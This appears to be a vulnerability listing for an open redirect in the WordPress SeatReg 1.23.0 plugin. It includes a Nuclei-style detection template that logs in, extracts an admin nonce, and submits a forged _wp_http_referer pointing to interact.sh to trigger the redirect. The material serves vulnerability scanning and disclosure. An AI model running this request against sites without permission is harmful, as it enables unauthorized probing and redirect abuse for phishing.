漏洞描述
WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.
seatreg-redirect: WordPress Plugin ‘SeatReg’ - Open Redirect
PoC代码[已公开]
id: seatreg-redirect
info:
name: WordPress Plugin ‘SeatReg’ - Open Redirect
author: Mariam Tariq
severity: medium
description: |
WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.
reference:
- https://packetstormsecurity.com/files/167888/WordPress-SeatReg-1.23.0-Open-Redirect.html
metadata:
verified: true
max-request: 3
tags: redirect,packetstorm,seatreg,wp-plugin,wp,wordpress,authenticated,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=seatreg-welcome HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new-registration-name=test&action=seatreg_create_submit&seatreg-admin-nonce={{seatreg-admin-nonce}}&_wp_http_referer=http://interact.sh&submit=Create+new+registration
matchers:
- type: dsl
dsl:
- status_code_3 == 302
- contains(header_3, 'http://interact.sh')
condition: and
extractors:
- type: regex
name: seatreg-admin-nonce
part: body
group: 1
regex:
- '"seatreg\-admin\-nonce" value="([0-9a-z]+)"'
internal: true
# digest: 490a004630440220415b511c3a3a92f7501ce0e8c989acc4468c0f7403f4bdd3cf048f083332a1a30220431457b9b557d16ea57e029ab8d1b6ab5e7edd577abfa95d749077a9eaf751f2:922c64590222798bb761d5b6d8e72950